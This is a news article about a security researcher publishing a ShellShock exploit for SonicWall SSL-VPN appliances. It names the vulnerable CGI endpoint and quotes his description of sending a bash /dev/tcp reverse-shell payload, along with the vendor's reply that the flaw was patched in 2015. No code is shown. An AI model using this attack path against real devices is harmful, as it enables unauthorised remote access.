A former member of the infamous hacktivist collective Lulz Security (LulzSec) has shared a zero-day exploit for a popular SonicWall VPN application, which utilizes the same vulnerabilities used by a notorious hacktivist known as Phineas Phisher to compromise the Italian spyware vendor Hacking Team and other companies.
On Monday, a security researcher Darren Martyn has published the exploit in his blog, after SonicWall revealed that hackers had breached its internal systems using a zero day flaw in its remote access tools.
“I’ve been sitting on this one for quite a while now, and figured what with SonicWall back in the news for getting owned via some 0days in their own s**t products, it would be somewhat amusing to release this,” Martyn wrote.
The researcher explained that SonicWall “Virtual Office” SSL-VPN products ship with an outdated version of Bash vulnerable to ShellShock, which makes them vulnerable to unauthenticated remote code execution (as a “nobody” user) via the /cgi-bin/jarrewrite.sh URL.
“The exploit is incredibly trivial. We simply spaff a shellshock payload containing a bash /dev/tcp backconnect at it, and we get a shell. Now, the environment on these things is incredibly limited – its stripped down Linux. But we have bash, openssl, and FTP. So you could always download your own toolkit for further exploitation,” Martyn said.
The researcher did not provide details on how to gain administrative privileges on the SonicWall VPN to prevent unskilled hackers from just copy pasting the exploit and using it in their attacks.
Following publication of the exploit code, SonicWall said that the vulnerabilities that this exploit relies on had been already patched.
“The vulnerability that this post is referencing was patched in 2015 in SMA 188.8.131.52. It cannot be exploited in version 9 or 10,” the company said in a message on Twitter.